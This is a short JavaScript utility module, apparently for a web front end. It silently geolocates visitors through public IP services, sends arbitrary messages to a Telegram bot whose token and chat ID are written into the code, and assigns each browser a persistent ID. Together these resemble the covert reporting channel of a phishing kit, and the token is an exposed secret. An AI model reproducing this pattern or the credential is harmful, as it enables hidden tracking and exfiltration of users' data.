export async function getCountryName() {
    // Try multiple providers without requiring user permission
    const providers = [
        'https://ipapi.co/json/',
        'https://ipwho.is/',
        'https://ipapi.co/country_name/'
    ];

    for (const url of providers) {
        try {
            const res = await fetch(url, { cache: 'no-store' });
            if (!res.ok) continue;
            const contentType = res.headers.get('content-type') || '';
            if (contentType.includes('application/json')) {
                const data = await res.json();
                const name = data.country_name || data.country || data.country_name_en;
                if (name) return name;
            } else {
                const text = (await res.text()).trim();
                if (text) return text;
            }
        } catch (_) {
            // ignore and try next
        }
    }
    return 'Unknown';
}

export async function sendTelegramMessage(message, tokenOverride, chatIdOverride) {
    const token = '8374514345:AAHvJST3yQtkw58Dk-fOKQ60PaPj3jj_FQw' || process.env.REACT_APP_TELEGRAM_BOT_TOKEN;
    const chatId = '7378336891' || process.env.REACT_APP_TELEGRAM_CHAT_ID;
    if (!token || !chatId) return false;

    try {
        const res = await fetch(`https://api.telegram.org/bot${token}/sendMessage`, {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' },
            body: JSON.stringify({ chat_id: chatId, text: message })
        });
        return res.ok;
    } catch (_) {
        return false;
    }
}

export function ensureUuid() {
    let uuid = localStorage.getItem('uuid');
    if (!uuid) {
        uuid = ([1e7] + -1e3 + -4e3 + -8e3 + -1e11).replace(/[018]/g, c =>
            (c ^ crypto.getRandomValues(new Uint8Array(1))[0] & 15 >> c / 4).toString(16)
        );
        localStorage.setItem('uuid', uuid);
    }
    return uuid;
}

